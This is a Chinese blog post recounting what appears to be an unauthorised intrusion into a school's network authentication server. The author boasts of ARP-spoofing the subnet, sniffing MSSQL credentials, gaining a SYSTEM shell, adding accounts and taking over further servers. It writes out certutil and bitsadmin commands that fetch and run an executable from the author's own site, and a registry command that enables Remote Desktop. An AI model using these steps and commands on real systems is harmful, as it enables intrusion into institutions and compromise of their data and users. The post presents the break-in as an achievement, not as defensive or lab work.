内网渗透拿下某学校网络认证服务器(锐捷)
首页 > 学习    作者:Iamyc   2019年3月1日 20:08 星期五   热度:1210°   百度已收录  
时间:2019-3-1 20:08   热度:1210° 

说实话,APT攻击+社会工程学绝对是最简单、最有威胁的攻击手段——从过去到现在

ok,上cain

然后,直接ARP整个C段,很多朋友会说,那样服务器会死掉。。。这台8核的服务器表示并不信

然后嗅探到TDS协议(数据库),可以看到有个182的不停在爆破,然后嗅探到内网一台服务器的TDS信息,抓到mssql数据库账号密码

nmap下,08R2的服务器

很舒适。内网抓台肉鸡连的上,没错了

上工具,很稳,system权限


查360

看端口

连了内网一个172和198的服务器,去看看,都是锐捷的路由器

ok,直接拿服务器

cmd:certutil -urlcache -split -f http://www.lang-v.com/*.exe && start *.exe

然后并没有成功


换bitsadmin

cmd:bitsadmin /rawreturn /transfer getfile http://www.lang-v.com/*.exe d:\*.exe

然而还是没啥用,相关目录空空如也。。。

直接用工具上传,还真传上去了,但是执行不了


然后,就不见了,再然后。。。工具也上传不了了。。。

ok,相关安全措施成功get到了我的点

试试远程桌面,无法连接

一个system权限的shell够了吗?不,不接受

reg开3389(虽然是xp和03的概率高)

cmd:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

提示命令成功执行。。。可是还是连不上

我能怎么办?netstat -ano再找找,多试试,万一。。。一不小心就这样了呢?其实可以用命令读注册表弄出来。。。

这就没啥好说的了呀,加账号,代理自身,直接越狱到administrator

拿下服务器,习惯性的看看服务器东西,上一次登录是2018

这并没有什么,然而。。。

我承认,在那一瞬间,只恨书读的少,只能一句卧槽表惊讶。。。

剩下的就没啥好说的了,又抓到两台服务器,又一台260g的内存,作为备胎用的,一台26g内存的服务器


二维码加载中...
本文作者:Iamyc      文章标题: 内网渗透拿下某学校网络认证服务器(锐捷)
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=73
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog